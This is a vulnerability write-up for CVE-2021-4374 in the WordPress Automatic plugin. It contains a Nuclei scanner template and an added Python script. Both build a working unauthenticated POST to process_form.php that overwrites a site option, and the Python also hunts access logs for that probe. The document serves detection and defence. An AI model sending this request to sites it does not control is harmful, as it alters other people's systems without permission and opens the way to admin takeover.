WordPress Automatic Plugin (versions 3.53.2 and below) contains a critical missing-authorization vulnerability (CWE-862) that lets unauthenticated users change arbitrary WordPress options through the plugin's process_form.php script. The script calls update_option() on every POST parameter it receives, with no authentication, nonce or capability check, so an attacker can create administrator accounts or modify critical settings. Because process_form.php is a standalone script that bootstraps WordPress itself and is requested directly, the flaw is reachable even when the plugin is deactivated; only updating past 3.53.2 or removing the plugin files closes it.

The Nuclei template below is tagged intrusive for a reason: it overwrites the blogdescription option (the site tagline) with a random marker and then fetches the homepage to confirm the marker is rendered. A positive match therefore means the target's tagline has actually been changed and has to be restored by hand afterwards.

PoC code (public)
id: CVE-2021-4374

info:
  name: WordPress Automatic Plugin - Unauthenticated Options Change
  author: intelligent-ears
  severity: critical
  description: |
    WordPress Automatic Plugin (versions 3.53.2 and below) contains a critical vulnerability that allows unauthenticated users to change arbitrary WordPress options through the process_form.php script. The vulnerable script uses update_option() on all POST parameters without authentication or capability checks, allowing attackers to create administrator accounts or modify critical settings. The vulnerability can be exploited even if the plugin is deactivated as it's a standalone script.
  reference:
    - "https://www.wordfence.com/blog/2021/09/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
    - "https://nvd.nist.gov/vuln/detail/CVE-2021-4374"
  classification:
    cve-id: CVE-2021-4374
    epss-score: 0.57016
    epss-percentile: 0.98022
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-862
    cpe: cpe:2.3:a:valvepress:wordpress_automatic_plugin:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: valvepress
    product: wp-automatic
    fofa-query: "wp-content/plugins/wp-automatic/"
    google-query: inurl:"/wp-content/plugins/wp-automatic/"
    shodan-query: 'http.html:"wp-content/plugins/wp-automatic/"'
  tags: cve,cve2021,wp,wordpress,wp-plugin,wp-automatic,unauth,intrusive,vkev

http:
  - raw:
      - |
        POST /wp-content/plugins/wp-automatic/process_form.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        field1={{randstr}}&field3=test&field4=test&field5=test&field6=test&blogdescription={{randstr}}

      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - '{{randstr}}'

      - type: status
        status:
          - 200
# digest: 490a004630440220704ba4d5618b3aba2cc6d75e53e9def07bcda9dadea1c2b3f2d43fa9a8ba367b02203c13309cb8eb51fe652dbdb54aabedfce5ec818aa991c55e1d6d7ad74b9837ce:922c64590222798bb761d5b6d8e72950
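The following Python is an added example, not part of the template above and not code from the wp-automatic plugin. It builds the same probe the template's first request sends (with a random marker standing in for `{{randstr}}`), applies the same decision as the template's two matchers to the follow-up homepage response, and on the defender side hunts web-server access logs for POSTs to process_form.php. The hostname, the homepage response and the log lines are all constructed for the example; sending the probe to a real host performs the same tagline overwrite the template does.

```python
import re
import secrets
from urllib.parse import urlencode

# Path of the standalone script the template posts to (taken from the template).
PROBE_PATH = "/wp-content/plugins/wp-automatic/process_form.php"


def make_marker(nbytes: int = 8) -> str:
    """Unique random marker, the role {{randstr}} plays in the template.

    A fixed string such as "test" would not do: the homepage could already
    contain it, and only a unique marker ties the observed change to our write.
    """
    return "probe" + secrets.token_hex(nbytes)


def build_probe(host: str, marker: str) -> str:
    """Raw HTTP/1.1 request equivalent to the template's first request.

    The blank line between headers and body is part of the format; a request
    without it carries no body and writes nothing. Content-Length is added
    here because we emit the raw bytes ourselves (Nuclei computes it for you).
    """
    body = urlencode({
        "field1": marker,
        "field3": "test",
        "field4": "test",
        "field5": "test",
        "field6": "test",
        # The option the check overwrites: the site tagline. A vulnerable
        # process_form.php passes every POST key straight to update_option().
        "blogdescription": marker,
    })
    return (
        f"POST {PROBE_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "\r\n"
        f"{body}"
    )


def confirm(homepage_body: str, status: int, marker: str) -> bool:
    """Same decision as the template's matchers (matchers-condition: and):
    the second response is a 200 AND its body (body_2) contains the marker."""
    return status == 200 and marker in homepage_body


# ---- defender side: hunt web-server access logs for the probe -------------
# Common/combined log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def hunt(log_lines):
    """Return (ip, timestamp, status) for every POST to process_form.php.

    Any such request is suspicious: nothing legitimate posts to that script
    from outside. A 200 on an unpatched host means options were written.
    """
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path.endswith(PROBE_PATH):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


# Constructed sample log lines (not from any real server). The second line
# is the probe; the others are ordinary traffic that must not be flagged.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Sep/2021:12:00:01 +0000] "GET /wp-content/plugins/wp-automatic/readme.txt HTTP/1.1" 200 1453 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Sep/2021:12:00:02 +0000] "POST /wp-content/plugins/wp-automatic/process_form.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Sep/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Sep/2021:12:00:04 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 10 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    marker = make_marker()
    print(build_probe("target.example", marker))  # the request that would be sent
    # Constructed homepage response as it would look after a successful write.
    page = f"<title>Example Blog &#8211; {marker}</title>"
    print("vulnerable:", confirm(page, 200, marker))
    for hit in hunt(SAMPLE_LOG):
        print("probe seen:", hit)
```

If you adapt this into a live check, keep the marker: it is what distinguishes "the option was written by me, now" from a tagline that happened to contain your test string already, and it is the value you will need to search for when restoring the site's original tagline.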